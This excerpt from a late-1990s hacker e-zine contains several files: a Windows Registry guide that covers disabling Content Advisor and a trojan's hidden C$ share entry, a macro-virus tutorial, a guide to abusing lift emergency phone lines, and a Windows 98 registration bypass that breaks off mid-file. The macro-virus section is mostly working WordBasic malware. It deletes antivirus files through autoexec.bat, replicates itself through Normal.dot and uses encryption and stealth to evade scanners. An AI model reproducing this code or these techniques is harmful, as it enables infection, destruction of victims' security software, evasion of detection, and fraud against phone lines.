Regedit is open you should see My Computer and six HKEY folders.
As your tool of control over the Windows environment you will have to
know Regedit intimately. There is no point being in the driving seat if
you can't use a steering wheel, and there is no point getting into a
car if you don't know how to turn the keys. Enough with the confusing
metaphors. Below is an extract from a Windows help topic:
"Overview Of Registry Editor.
Registry Editor is an advanced tool that enables you to change
settings in your system Registry, which contains information about how
your computer runs. Generally, it is best to use Windows controls to
change your system settings.
You should not edit your Registry unless it is absolutely necessary. If
there is an error in your Registry, your computer may become non
functional. If this happens, you can restore the Registry to its state
when you last successfully started your computer. For instructions, see
Related Topics below."
As you can see it is the usual bullshit from the bureaucrats at
Microsoft. I think what they are really trying to say is that if you
start fucking with the Registry you have passed the point of no return.
Bill Gates asks you not to go down that road. Warning users off from
things that might get icky is a sort of Microsoft trademark. They are
safe in the knowledge that their half-assed assessment of Regedit will
frighten most new users away. The most key utility to controlling your
Win32 box is hidden away in c:\windows with no shortcuts and a whole
nine lines devoted to describing it, most of which fits into the
Microsoft play-it-safe agenda.
<*> Hkey Definitions
{1} Hkey_Classes_Root
This key points to a branch of Hkey_Local_Machine that describes
certain software settings. This key contains essential information
about OLE and drag and drop operations, shortcuts, and core aspects of
the Windows 95 GUI which we all think are so pretty =).
{2} Hkey_Current_User
This key points to a branch of Hkey_Users for the user who is currently
logged onto the system. Sort of like the equivalent of the Unix who
command but not really.
{3} Hkey_Local_Machine
Contains computer specific information about the type of hardware,
software, and other preferences on a given PC. This information is used
for all users who log onto this computer. The data is stored in machine
code. The software side often includes the serial keys for products you
have registered and sometimes encrypted passwords.
{4} Hkey_Users
This key contains information about the users that log onto the
computer. Both generic and user-specific information is used, and each
user who uses the system has their own Subkey to accompany the .pwl
file in c:\windows. The .pwl file contains the password data whilst the
specified Subkey contains all other information.
{5} Hkey_Current_Config
This key points to a branch of the Key Hkey_Local_Machine \Config that
contains information about the current hardware configuration. It is
updated when you use the Add New Hardware program.
{6} Hkey_Dyn_Data
This key points to a branch of Hkey_Local_Machine that contains various
bits of information regarding the System's Plug and Play configuration.
This information is DYNAMIC, meaning that it may change as devices are
added to or removed from the computer.
<*> Disabling Content Advisor Ratings
The thing about the Registry is that although Microsoft lean on it to
keep Windows tip-top they are more dependant on it than you might
realise. I mean that they utilise it the running of other Microsoft
products. Internet Explorer for instance, although it has been said
that it is an integral part of Windows (Microsoft are still in court
over that one). The insides of IE are stored in the Registry, including
their Internet Options. I have read Usenet posts about reg keys that
lower the security zone in IE or enable Java and other malicious
things. Take for example the password encoded censor Content Advisor
Ratings. If you want to disable their page blocking open up you Regedit
and find the key below:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings\Key
Now just rename Key to something else e.g. KeyFucked. The next time the
Content Advisor Ratings are running the system will not be able to find
the key it is searching for. They key actually contains the encrypted
password information. I'm sure you can already think of ways that this
might be useful. If you are interested in this topic I suggest you do
a net search on algorithms.
<*> Hidden Shares
You must have seen the hype concerning all those Windows trojans. Any
guy off the street could own a Windows box, am I right? Well anyone who
has ever had to remove a nasty proggie will know where the server
implants itself, the Registry. For the trojan to function 24/7 it needs
to initialise every time Windows starts up. Now I don't think Back
Orifice would have been quite as popular if it required you to place
a shortcut in the Startup folder or a line in win.ini.
You can create the lame trojan effect with a Registry key that uses the
DOS prompt as the client for controlling the target computer. This
works by connecting to shares. Shares are what Windows uses to share
resources from computer to computer. The NetNinja Setup trojan creates
the C$ admin share in:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\C$
This will assign the remote shared drive to the next available letter on the
user's machine and grants full read/write access. When run, the Setup
trojan creates a hidden share of drive C: and it places four entries in
that key as follows:
"Flags"=dword:00000302
"Path"="C:\\"
"Remark"=""
"Type"=dword:00000000
Two things cause the share to be invisible. The "$" at the end of the
name hides any share from the NET VIEW command and to Net Watcher's
shared folder listing. The Setup Trojan can be downloaded from:
http://www.netninja.com/files/SetupTrojan.zip
<*> Registry Programming
Now, before I start I must say that there really is no such thing as
Registry programming as such. Registry information is not like a
programming language, you're not really supposed to make reg keys.
Although it is viable to reprogram your registry with programs through
various programming languages that is entirely different. What I'm
talking about is generally called Registry editing. Similar to
patching hex or binary because if you move one space or character out
of place then the executable will dysfunction, no questions asked. It
is important to understand this.
However editing your Registry is easier because it's values are often
represented by real words and the more you look at and change keys, the
more you will recognise things that repeat. Of course, the reason that
reg keys don't equate to a programming language is because there is
only similarities, never defined code. They use all sorts of values
as well such as binary, hex, hexadecimal etc. Open up all reg keys in
Wordpad and save new ones in Wordpad. It is important you use Wordpad
and not any other text editor.
Below is a reg key which opens up all files with an unrecognised file
extension with DOS Edit. Instead of opening the Open With dialog box
you will be brought straight into DOS Edit to view the files. This is
handy for viewing files made in Unix with no extensions. Note the
Registry definition "ASCII Viewable Document" which means a text file
"Content Type"="text/plain". Of course if you have ever fooled around
with DOS Edit before you will notice it doesn't support executables.
This means if you use it to open a .exe file it will represent it in
text as best as is possible. This key also ties defines .nfo and .diz
as plain text file types. This is handy because although they are
famous file extensions they were not created with any text editor in
mind so this reg key tells the system they are text files without
having to reformat them with a fixed text editor.
----- begin dosedit.reg -----
REGEDIT4
[HKEY_CLASSES_ROOT\asciifile]
@="ASCII Viewable Document"
"EditFlags"=hex:00,00,01,00
[HKEY_CLASSES_ROOT\asciifile\Shell]
@=""
[HKEY_CLASSES_ROOT\asciifile\Shell\open]
[HKEY_CLASSES_ROOT\asciifile\Shell\open\command]
@="edit.com %1"
[HKEY_CLASSES_ROOT\asciifile\DefaultIcon]
@="C:\\WINDOWS\\SYSTEM\\shell32.dll,64"
[HKEY_CLASSES_ROOT\.diz]
@="asciifile"
"Content Type"="text/plain"
[HKEY_CLASSES_ROOT\.nfo]
@="asciifile"
"Content Type"="text/plain"
----- end dosedit.reg -----
<*> Extracting Registry Data
Now we will take a look at some Registry data. Here is an example of a
perl script taken from 'Learning Perl on Win32 Systems'.
----- begin reg.pl -----
#! c:\perl\bin\perl.exeuse
Win32::Registry;
$p = "SOFTWARE\\Microsoft\\Windows
\\CurrentVersion";
$main::HKEY_LOCAL_MACHINE->Open($p, $CurrVer) ||
die "Open: $!\n";
$CurrVer->GetValues(\%vals);
foreach $k (keys %vals) {
$key = $vals{$k};
print "$$key[0] = $$key[2]\n";
}
----- end reg.pl -----
<*> Hkey_Local_Machine Subkey Functions
As anyone who is experienced in using the Registry will tell you, the
Hkey_Local_Machine directory is the key to controlling your Windows
box. Here is a brief rundown of its standard Subkeys.
--> /Config [ A collection of configurations for the local ]
[ computer. ]
--> /Enum [ Info on the system's installed hardware devices. ]
--> /Hardware [ Info on the ports and modems used with ]
[ hyperterminal. ]
--> /Network [ Info created when a user logs on to a networked ]
[ computer. ]
--> /Security [ Info on network security and remote ]
[ administration. ]
--> /Software [ Info about software and it's configuration on ]
[ the system. ]
--> /System [ The database that controls system start-up, ]
[ device driver loading, Windows 95 services, and ]
[ O/S behaviour. ]
<*> Signing Off
_________ ___ ____ ____ ____ ______
/ ____/\ \/ // __ ) / __ \ / __ ) / ____/
/ / \ // __ |/ / / |/ __ |/ / __
/ /___ \ // /_/ // /_/ // / / // /_/ /
\____/ /_//_____/ \____//_/ /_/ \____/
cyborg@disinfo.net
http://cyborg.ie.8m.com
"its not stolen, it fell off the back of a truck"
[mousey] [franco] [hitman] [simo] [r0b] [cheesy] [gpf#2] [crypt0genic]
[demonr] [alan509] [darkflame] [crossfire] [zirqaz] [force] [zomba]
[axcess] [firestarter] [freeman] [ego] [sunburst] [bluecat] [lordphaxx]
[hellbent] [tefx] [g_h] [rekcah] [neonbunny] [n1s] [h2so4] [npn] [call]
[tds] [swat] [darkcyde] [scorpion] [#hackers_ireland] [#hackerzlair]
:..::..End Of File..::..:
:..::..File 9 Of 14.::..:
:...Making Macro Virii..:
:.::.:.:.By Tefx.:.:.::.:
<*> tefx@hotmail.com
http://www.infowar.co.uk/ampersand
Making Macro Virii - Another FAQ
[9] - Retro Commands
[10] - Anti Heuristic (Encryption)
[11] - Stealth (ToolsMacro And File Save)
[12] - Multi Lingual
[13] - Polymorphism
[14] - Advanced and Wierd Techniques
Firstly there are a few things you should know:
1. I am not teaching Word Basic ! I am showing you macro virii
techniques.
2. I assume you know Basic/WordBasic or are able to comprehend it.
3. I personally assume no responsibility for incidents relating
indirectly/directly to this article.
4. Most of the techniques shown will be picked up by Av scanners, so
you will have to use farily complicated techniques to avoid
detection. (Anti Heuristic)
Warning !
Backup all found copies of "NORMAL.DOT" - I mean it!
Believe me. YOU WON'T REGRET IT !
If you don't yet have an understanding of Basic do so. I will be using
WordBasic (6.0) Not VBA ('97) as I understand it, and it's easier to
make. So if you have 97 look up "equivilant commands" in the VBA help
file.
[9] - Retro Commands
Retro is where the Virus takes revenge against
the scanner, deleting it !
I was going to show you some of the many retro
virii but i only needed to show you one
"AntiAVs" : Ingenious. I have only shown the retro
commands.
> Sub MAIN
> t1$ = "Found virus "
> t2$ = " and has been clean."
> t3$ = "AntiAVs"
> DisableInput 1
> On Error Resume Next
> AV1$ = Files$("C:\PC-Cillin 95\Scan32.dll")
> If AV1$ = "" Then Goto AV2
> SetAttr "c:\autoexec.bat", 0
> Open "c:\autoexec.bat" For Append As #1
> Print #1, "@echo off"
> Print #1, "attrib -h -r -s +a c:\pc-cil~1\*.* >nul"
> Print #1, "del c:\pc-cil~1\*.dll >nul"
> Close #1
> Kill "C:\PC-Cillin 95\Lpt$vpn.*"
> 'MsgBox t1$ + "PC-CILLIN 95" + t2$, t3$, 48
>
> AV2:
> AV2$ = Files$("C:\PC-Cillin 97\Scan32.dll")
> If AV2$ = "" Then Goto AV3
> SetAttr "c:\autoexec.bat", 0
> Open "c:\autoexec.bat" For Append As #1
> Print #1, "@echo off"
> Print #1, "attrib -h -r -s +a c:\pc-cil~1\*.* >nul"
> Print #1, "del c:\pc-cil~1\*.dll >nul"
> Close #1
> Kill "C:\PC-Cillin 97\Lpt$vpn.*"
> 'MsgBox t1$ + "PC-CILLIN II" + t2$, t3$, 48
>
> AV3:
> AV3$ = Files$("C:\Tsc\PC-Cillin 97\Scan32.dll")
> If AV3$ = "" Then Goto AV4
> SetAttr "c:\autoexec.bat", 0
> Open "c:\autoexec.bat" For Append As #1
> Print #1, "@echo off"
> Print #1, "attrib -h -r -s +a c:\tsc\pc-cil~1\*.* >nul"
> Print #1, "del c:\tsc\pc-cil~1\*.dll >nul"
> Close #1
> Kill "C:\Tsc\PC-Cillin 97\Lpt$vpn.*"
> 'MsgBox t1$ + "PC-CILLIN II" + t2$, t3$, 48
>
> AV4:
> AV4$ = Files$("C:\Zlockav\Gsav.dat")
> If AV4$ = "" Then Goto AV5
> Kill AV4$
> Kill "C:\Zlockav\Gsav.cas"
> 'MsgBox t1$ + "Zlock" + t2$, t3$, 48
>
> AV5:
> AV5$ = Files$("C:\VB7\Virus.txt")
> If AV5$ = "" Then Goto AV6
> Kill AV5$
> 'MsgBox t1$ + "VB7/VB95" + t2$, t3$, 48
>
> AV6:
> AV6$ = Files$("C:\Program Files\Norton AntiVirus\Viruscan.dat")
> If AV6$ = "" Then Goto AV7
> Kill AV6$
> Kill "C:\Program Files\Symantec\Symevnt.386"
> 'MsgBox t1$ + "NAV95" + t2$, t3$, 48
>
> AV7:
> AV7$ = Files$("C:\Program Files\McAfee\VirusScan95\Scan.dat")
> If AV7$ = "" Then Goto AV8
> Kill AV7$
> Kill "C:\Program Files\McAfee\VirusScan95\Mcscan32.dll"
> 'MsgBox t1$ + "VirusScan95" + t2$, t3$, 48
>
> AV8:
> AV8$ = Files$("C:\Program Files\McAfee\VirusScan\Scan.dat")
> If AV8$ = "" Then Goto AV9
> Kill AV8$
> Kill "C:\Program Files\McAfee\VirusScan\Mcscan32.dll"
> 'MsgBox t1$ + "VirusScan95 3.0" + t2$, t3$, 48
> AV9:
> AV9$ = Files$("C:\Program Files\Command Software\F-PROT95\Sign.def")
> If AV9$ = "" Then Goto AV10
> Kill AV9$
> Kill "C:\Program Files\Command Software\F-PROT95\Dvp.vxd"
> 'MsgBox t1$ + "F-Prot 95" + t2$, t3$, 48
>
> AV10:
> AV10$ = Files$("C:\Program Files\AntiViral Toolkit Pro\Avp32.exe")
> If AV10$ = "" Then Goto AV11
> Kill AV10$
> Kill "C:\Program Files\AntiViral Toolkit Pro\*.avc"
> 'MsgBox t1$ + "AVP 95" + t2$, t3$, 48
> AV11:
> AV11$ = Files$("C:\TBAVW95\Tbscan.sig")
> If AV11$ = "" Then Goto exit
> SetAttr "c:\autoexec.bat", 0
> Open "c:\autoexec.bat" For Append As #1
> Print #1, "@echo off"
> Print #1, "attrib -h -r -s +a c:\Tbavw95\*.* >nul"
> Print #1, "del c:\Tbavw95\Tb*.* >nul"
> Close #1
> Kill "C:\Tbavw95\Tbavw95.vxd"
> exit:
> end sub
[10] - Anti Heuristic (Encryption)
The idea behind ecryption, I belive was first
concieved by NJ, with the killok virus. the
prinicpal is simple , and so is the encryption
as any ^real^ encryption would take years as
wordbasic is so slow !
The reason for encryption (asif it isnt obvious
enough) id to combat heuristic scanners, which
often just search for MacroCopy in the document
Or RndWord in the case of wazzu
Encrypting a line is easy, it is just adding 1 (or
any number) to the ascii value of the infection code.
A simple macro virii (The Q Virus)
> On Error Resume Next 'Just Carry on if an error occurs
> File$=filename$()+":AutoOpen" 'The Active File
> Global$="Global:AutoOpen" ' The Global Template
> MacroCopy file$,global$
> FileSaveAs .Format = 1
> MacroCopy Global$,File$
This is incredibly simple as it requries no
checking routine: it first tries to copy the macro
from the file to the global template, then tries copy
the macro from the global template to the active file
So it doesnt need to check!
But anywhay back to the encryption, if we add 1 to the
ascii value of each line we get this result
> Po!Fssps!Sftvnf!Ofyu
> Gjmf%>gjmfobnf%)*,#;BvupPqfo
> Hmpcbm%>#Hmpcbm;BvupPqfo#
> NbdspDpqz!gjmf%-hmpcbm%!
> GjmfTbwfBt!/Gpsnbu!>!2
> NbdspDpqz!Hmpcbm%-Gjmf%
So, the autoOpen macro must decrypt the above code
run it then delete it, so we puthe above data into an array
to give this lovely piece of code
Macro AutoOpen
Sub Main
Screen Updating 0
DisableInput 1 ' Stop the user intterupting me
ScreenUpdating 0 ' Stop the user seeing whats really happening
A$(1)="Po!Fssps!Sftvnf!Ofyu"
A$(2)="Gjmf%>gjmfobnf%)*,#;BvupPqfo"
A$(3)="Hmpcbm%>#Hmpcbm;BvupPqfo#"
A$(4)="NbdspDpqz!gjmf%-hmpcbm%!"
A$(5)="GjmfTbwfBt!/Gpsnbu!>!2"
A$(6)="NbdspDpqz!Hmpcbm%-Gjmf%"
ToolsMacro .Name = "Virus", .Show = 1, .Edit '
'Create a new macro to hold the decrypted code
For i = 1 To 6
'
- Loop for every command
For x = 1 To Len(A$(i)) 'Loop for each
'Character in the encrypted command
b = Asc(Mid$(A$(i), x, 1))
c = b - 1
If c < 0 Then c = c + 255
d$ = d$ + Chr$(c)
Next x
'decrypt the macro
Insert d$ 'and paste itt into the new file
InsertPara'and press enter
d$ = "" 'clear the decrypted code to start again
Next i 'Onto the next command
DocClose 1 'Close the macro
Virus 'run the code
ToolsMacro .Name = "Virus", .Show = 1, .Delete
'And delete it
End Sub
This works by Decrypting the macro which in turn
copies "AutoOpen" to the global template or the
active file, then the AutoOpen macro deletes the
encrypted version. To include a payload, either
the payload would be added to the encrypted macro
or having a separate encrypted macro.
Keep in mind this process of encryption.
Just as easiy we could insert "+" into the commands to
hide it from the Av scanners
e.g
> A$(1)="O"+"n E"+"rror"+" R"+"esu"+"me Next"
> A$(2)="Fil"+"e$"+"=fil"+"ena"+"me$()+"+chr$(34)+":Au"+"toOp"+"en"+chr$(34)
> A$(3)="Gl"+"oba"+"l$="+chr$(34)+"Gl"+"oba"+"l:A"+"uto"+"Op"+"en"+chr$(34)
> A$(4)="Ma"+"cro"+"Cop"+"y fil"+"e$,g"+"lob"+"al$ "
> A$(5)="File"+"Save"+"As"+" ."+"For"+"ma"+"t = 1"
> A$(6)="Ma"+"croC"+"op"+"y G"+"loba"+"l$,Fi"+"le$"
So withoput the need for encrtpion, an anti heuristic method
is achived, this also means that the macros copying routine
works faster, and its easier to encode
The other proceess is to disguise the caommands
by using the \ character like this
> FileSaveAs \
> .Format=1
Then putting Comments after it
> FileSaveAs \'Hsjhdshd
> .Format=1 'hnjdshjd
[11] - Stealth (ToolsMacro And File Save)
The ToolsMacro Problem is that if you try and
run it it will either show you the virus or have a
lame Memory error
+ Removal Method
> ToolsCustomizeMenus .Name = "ToolsMacro", .Menu = "Tools", .Remove
Remove ToolsMacro From the menu
+ Lammme Method 1
When the user tries to run Tools macro
nothing happens
> Sub Main
> End sub
+ Lammme Method 2
When the user tries to run Tools macro
a lame memory method runs happens
> Sub Main
> MsgBox" WordBasic Memory error -7"
> End sub
+ Primitive Tools Macro Routine
This just shows up a fake box with an error
message when you try to do things.
> Sub main' ToolsMacro
> Dim ComboBox1$(0)
> ComboBox1$(0) = ""
> Dim ListBox1$(0)
> ListBox1$(0) = ""
> Dim DropListBox2$(0)
> DropListBox2$(0) = "Normal.dot"
> DisableAutoMacros 0
> Begin Dialog UserDialog 442, 320, "Macro"
> PushButton 290, 14, 141, 21, "Rec&ord...", .Definierbar2
> CancelButton 290, 43, 141, 21
> PushButton 290, 72, 141, 21, "&Run", .Definierbar3
> PushButton 290, 102, 141, 21, "&Edit", .Definierbar4
> PushButton 290, 130, 141, 21, "&Delete", .Definierbar5
> PushButton 290, 166, 141, 21, "Or&ganizer...", .Definierbar6
> ComboBox 7, 23, 269, 194, ComboBox1$(), .ComboBox1
> Text 6, 223, 93, 13, "Macros &Available In:", .Text1
> Text 7, 259, 109, 13, "Descr&iption:", .Text2
> Text 7, 6, 93, 13, "Macros:", .Text3
> ListBox 7, 276, 425, 38, ListBox1$(), .ListBox1
> DropListBox 6, 238, 425, 19, DropListBox2$(), .ListBox2
> End Dialog
> Redim dlg As UserDialog
> If Dialog(dlg) = 0 Then
> Cancel
> Else
> MsgBox "Not enough memory", "WordBasic Err = 7"
> End If
> End Sub
+ The FileSaveAs Problem
The problem is that once the file is a template word acts like an
absolute bugger :- check this yourself try FileSaveAs With a template
Its a git
The Solution is to create a new file using the infected document(template)
and then infecting it. complex :-X (Ie we make a new non template clean
copy and then do the dirty work)
I learned his method from "Jackie Querty [29A]" and stole the code from
his phile
> Sub FileSaveAs ' Our "FileSaveAs" macro
> On Error Goto endFileSaveAs '
> Dim dlg As FileSaveAs ' Declare dlg as FileSaveAs dialog box
> GetCurValues dlg ' Get current values into dlg
> If dlg.Format <> 1 Then ' Not a template? (i.e. not infected?)
> Dialog dlg ' No, a clean document, show box
> FileSaveAs dlg ' Save the new document
> Infect(dlg.Name) ' Infect it! go!
> Else ' It's a template (i.e. it's infected)
> TempWindow = Window() ' Get current window (template)
> OriginalName$ = dlg.Name ' Get original document name
> FileNew .Template = FileName$() ' Create new doc based on template!
> On Error Goto CloseDoc ' Now on: if any error close new doc
> GetCurValues dlg ' Get current values for new doc
> dlg.Name = OriginalName$ ' Change doc name for original one
> Dialog dlg ' Ok, show FileSaveAs dialog box
> FileSaveAs dlg ' Save the new document
> On Error Goto endFileSaveAs ' Now on: if any error just go
> Infect(dlg.Name) ' Ok, infect new document
> If TempWindow >= Window() '
> TempWindow = TempWindow + 1 ' Get old template window number
> EndIf '
> WindowList TempWindow ' Make it the active window
> CloseDoc: '
> FileClose 2 ' Close it without promptin
> End If '
> endFileSaveAs: ' We're done! "SaveAs" problem fixed!
> End Sub '
[12] - Multi Lingual
Another problem faced by Vx, and we thought MicroShaft
was here to help :) Basically the problem is in the
Menus, ToolsMacro wont work in the germanversion, as it
is called ExtrasMakro (I Think), so Mtcroshaft to the
rescue, have provided us with means to solve this problem.
+ Simple method...
When Infecting Normal.dot dont just do
> MacroCopy F$,"Global:ToolsMacro"
Use this as well
> MacroCopy F$,"Global:ExtrasMakro"
So you are copying the same macro to the different lingual
commands.
+ Not as simple as before
When Writing your macro, write each macro Separately, I.e
ToolsMacro and ExtrasMakro, one having german buttons
and messages, the other having englissh buttons :)
[13] - Polymorphism
Traditionally polymorphism was achived by a method
of encryption. The encrypted code was dercrypted,
then re-encrypted into the new file.
Lucity in Macro Virii there are easier options to
tread. In reality when using polymorphism through
encryption you are showing off, or hiding a well
known payload, which could had just as easily been
encrypted
There is another method which still uses an encrypted
macro wich once decrypted, copys the encrypted macro
to a temp file, then edits the temp file, and copies
it to the final location, and deletes the temp macro.
Instead of encryption, there is a method which avoids
the use of encryption.
In which a separate macro which name is randomised which
opens up the non active macros and removes the existing
comments (if any) and writes more random comments
If you have used the encoding method which uses "+" inserted
randomly, It is probably possible to randomize them
for instance.
AutoOpen
Once decrpted this macro copies the other macros (if needed)
and randomizes the macros in the global tempolate
And the other macros do the same.
If you haven't guessed by now, I see polymoprhism as an action
that may avoid scanners, but the time taken to write the code,
and morph the code, cancels out the usefullness. Stick to the
anti heuristic methods.
Basically , only for those who want to prove a point ;)
[14] - Advanced and Wierd Techniques
+ dRoKz
Another inspiration by NJ :O , As there is an organizer copy function
in the language, it can be achived through dialog after dialog.
> SendKeys "%tm%g%c{ESC}"
%t - Tools m - Macro : Selects ToolsMacro
%g : Selects the Organizer
%c : Copys the macro :0
{esc} : close all the windows
So this uses the organizer, but a different version must exist for
different languages :(
+ The Virtual Boy Method
Instead of copying itself too the global template, the virus
copies its self to the default directory, as adds itself to
the templates list, and so, is a bugger to get rid of, as deleting
nomal.dot makes no difference
hehehe... But it makes it harder to have Anti Heuristic capabilities
:|
So here we are..the routine to infect normal.dot
> Sub InfectGlobal
> 'a$ = Startup Path from WinWord.
> a$ = DefaultDir$(8) + "\0.dot"
> 'Where we'regoing to store our macros
> REM Copy the infected document to this Startup Path.
> If Files$(a$) = "" Then
> 'If its Not there
> ' This is a good way to check if your infecting a document
> ' or the global !
> CopyFile FileName$(), a$
> 'Copy it
> REM Enable the virus!
> AddAddIn a$
> EndIf
> End Sub
Then if you're wondering if it was worth it then have a look at this
perfect stealth in macro virii.
> Sub MAIN
> REM Get the position of the infected document.
> b = GetAddInId(DefaultDir$(8) + "\0.dot")
> REM Set ScreenUpdating Off
> ScreenUpdating 0
> If DocMaximize() Then
> DocMaximize
> c = 1
> EndIf
> REM Create a new file to hide the virus macros in the active file.
> FileNew
> REM Remove now the virus document from the ToolsMacro box.
> If b Then AddInState 1, 0
> REM ToolsMacro Options
> Dim d As ToolsMacro
> On Error Resume Next
> Dialog d
> REM Close the document.
> FileClose
> REM Enable now again the virus document.
> If c Then DocMaximize
> If b Then AddInState 1, 1
> REM Show the user the >> clean << Box. ;)
> ToolsMacro d
> End Sub
Trying to replicate this without the special routine is almost
impossible heheha :)
:..::..End Of File..::..:
:..::.File 10 Of 14.::..:
:.Elevator Beige Boxing.:
:.:..:.By Holyblob.:..:.:
Introduction
~~~~~~~~~~~~
Eye eye kids.
Welcome to my file on beige boxing in a lift. Yep, believe it or not,
you can beige from inside a lift car and I'm gonna tell ya what I know.
First Off
~~~~~~~~~
Well first off, your gonna have to find a lift with an emergency phone
(you can get the picture already :>). The lifts I recommend are shop
lifts that only have a few floors cause they are usually lame enough to
have a phone and not an intercom and sometimes, if they're pure stupid,
they have a sticker stuck in the phone box telling you to ring security
on ext. xxxx or dial 999 in the case of an emergency!! Lifts like these
are asking for abuse. You will also find this in office blocks and
other large buildings but they are harder to get into and are more
likely to be full of pricks in suites. Obviously dinner times are the
worst so avoid them like the plague if you're going into larger
buildings.
Caution: Just a word of warning, the stainless door to the emergency
phone sometimes has an auto alarm and can be *real* loud. This only
happens about 1% of the time but just be warned. If you're real unlucky
you can get a phone door that's linked into the safety circuit as well
as alarmed. This means that the lift will suddenly stop and an alarm
will sound if you open the phone door. However, this is very rare and
I've only come across it once on an old express lift. The lift will run
once the phone door is closed over again but the alarm needs resetting
up in the motor room SO RUN LIKE FUCK or you will be hammered cause a
qualified lift engineer needs to be called to go into the motor room
and reset the alarm (pretty pricey).
Tricks of the Trade
~~~~~~~~~~~~~~~~~~~
Lifts in shops are mainly for moving stock so they are used pretty
often. I find that you are best to keep moving between the ground floor
and the top floor but never stopping at the shop floor. If you're in
the car, it can still be called to all the floors by people waiting
there. This can't really be avoided unless you have a special key. But
here's an excuse you can use if your in the lift and it starts to go up
to the stock room, or somewhere you're not supposed to be:
(The person gives you a funny look or makes a comment)
You say: Tut, I pressed both buttons didn't I? I'm just too impatient.
(Then laugh lightly)
This works wonders cause it means that if someone puts a call in on the
floor above and you want to go down put press both landing buttons, you
get in and press ground but the lift will collect the person above
first cause you pressed both buttons. I hope that made sense :>. But,
if you're sat at a floor and someone wants the lift, the doors are
gonna open with no warning and you're gonna be stood there with the
phone in your hand. Hmmm, nasty. If that happens, just say "Fuck me, I
thought I was stuck, I was just about to call for help". And if you're
asked what happened, say "The button lit up but went out as I took my
finger off".
MAKE SURE THAT THE BUTTONS LITUP IN THE FIRST PLACE!!!
If you've managed to get into a large building, most lifts are paired.
Just hop into one of them and get yourself stuck making sure you can
get yourself unstuck. Stay stuck for about 5 or 10 minutes then take
the lift for a mooch so it looks like its still working. When you've
had your fun, jump out and, go down to ground in the other lift and
walk out (a little paranoia never hurt anyone).
Remotely does it
~~~~~~~~~~~~~~~~
This is a nice little way to use the line in the lift from outside the
building in the comfort of your car or whatever. Just go to a HAM Radio
Fair and pick up a cordless phone for about a 10 spot and use terminal
block to connect it into the cable. If you want it to last longer than
a couple of weeks, get a sheet of stainless and make a false back if
the box is big enough. Hide your phone behind the false back and screw
the emergency phone to the false back. If you're using an old cordless,
to power packs supplies it 8V AC~ but you can power it with the battery
backup or a 9V battery where the power pack goes. This just means that
you can't charge the handset cause I think it needs an AC current to do
this. Your gonna have to cut the charge unit out of the phone anyway so
you can charge the handset up or find out the rating of the handset
battery and make a transformer for your car. Then get an acoustic
coupler and use it for net access :) There's no limit to what you can
do except the battery life of the base unit so have fun and play safely
kids :)
holy
==================================
===============================
| _________ ======================= _________ |
| ¬¬¬;¬¬¬;¬ */ __ \ ___ _______ / __ \ |
| ¬¬¬¬¬¬¬¬ */ /::\ /*/ / ¬¬ */ \ / /::\ /* ¬ |
| ¬;¬¬¬;¬ */ /:::/ /*/ / ¬¬ */ ___ /*/ /:::/ /* ¬¬ |
| ¬¬¬¬¬¬ */ /___/ /*/ / ¬¬ */ /::::\ /*/ /___/ /* ¬;¬ |
| ¬¬¬;¬ */ __/*/ / ¬¬ */ /:::: / /*/ __/* ¬¬¬¬ |
| ¬¬¬¬ */ ___ \ / / ¬¬ */ /:::::/ /*/ ___ \ ¬;¬¬¬ |
| ¬;¬ */ /:::\ /*/ / ¬¬ */ /:::::/ /*/ /:::\ /* ¬¬¬¬¬¬ |
| ¬¬ */ /::::/ /*/ /_____ */ _____/ /*/ /::::/ /* ¬;¬¬¬;¬ |
| ¬ */ /____/ /*/ /*/ /*/ /____/ /* ¬¬¬¬¬¬¬¬ |
| */__________/*/________/* _________/*/__________/* ¬;¬¬¬;¬¬¬ |
=================================================================
=holyblob@hotmail.com
=ICQ 31783228
:..::..End Of File..::..:
:..::.File 11 Of 14.::..:
:.::.Windows 98 Flaw.::.:
:..::.:.By HitMan.:.::..:
Introduction:
-------------
Want to hear about the flaw I discovered? When I was installing Windows
98 on my computer the other week I noticed a little flaw. So basically
here's how it's done.
First of all I got the CD off a mate that got it with his brand new
computer and a big problem was that the dumbass forgot to bring over
the manual containing the 25 digit code that you need to register
Windows 98. The guy also lived too far away to go and get it so I had
to leave my machine on whilst I awaited a phone call with the code. But
after a long time the guy did not call and I was getting very fed up
with my machine being on.
<*>--------------------------How It's Done--------------------------<*>
So I clicked not to accept the license agreement, this then sent me
crashing out of the install program and into DOS. It then struck me
that it asked me for the 25 digit code after it had copied the files
onto my hard disk, meaning that there must be some sort of Win32 file
system copied onto my computer.
Another thought also struck me, it was the notion that Windows 95 put
up the prompt below:
*******<Screen>*******
Starting Windows 95...
*******<Screen>*******
When this prompt came up you could hit F8 (or sometimes F5) and it
would bring up a boot menu with several options such as:
**************************SCREEN*************************
* *
* Microsoft Windows 95 Startup Menu *
* ================================== *
* *
* 1. Normal *
* 2. Logged (\BOOTLOG.TXT) *
* 3. Safe mode *
* 4. Safe mode with Network support *
* 5. Step-by-step confirmation *
* 6. Command prompt only *
* 7. Safe mode command prompt only *
* 8. Previous version of MS-DOS *
* *
* Enter a choice: ? *
* *
* *
* *
* *
* *
* *
* F5=Safe mode Shift+F5=Command prompt *
* *
**************************SCREEN*************************
So I thought just maybe these would be in Windows 98 as well. However
there was a technical hitch, Windows 98 did not bring up a "Starting
Windows 98..." so it basically meant that I would have to time the
pressing of the F8 key with the Starting Windows 98 bitmap screen...
and hey presto a boot menu did come up:
**************************SCREEN*************************
* *
* Microsoft Windows 95 Startup Menu *
* ================================== *
* *
* 1. Normal *
* 2. Logged (\BOOTLOG.TXT) *
* 3. Safe mode *
* 4. Safe mode with Network support *
* 5. Step-by-step confirmation *
* 6. Command prompt only *
* 7. Safe mode command prompt only *
* 8. Previous version of MS-DOS *
* *
* Enter a choice: ? *
* *
* *
* *
* *
* *
* *
* F5=Safe mode Shift+F5=Command prompt *
* *
**************************SCREEN*************************
(Not really much difference!)
It gave me the option I needed Safe Mode eventually I selected this
and Windows amazingly went slowly into configuring the system and then
onto Safe Mode.
<*>----------------------------Next Up------------------------------<*>
So what do you do next? I hear you ask.
Click Start Menu|Run and type "REGEDIT" to bring up the registry editor
and click on Hkey_Local_Machine and then onto:
SOFTWARE/MICROSOFT/WINDOWS/CURRENT VERSION
Now you will see some files here and there but the ones you need to
edit are:
ProductID
RegisteredOrganization
RegisteredOwner
**********CAUTION**********
This can easily scramble
your machine so be careful.
***************************
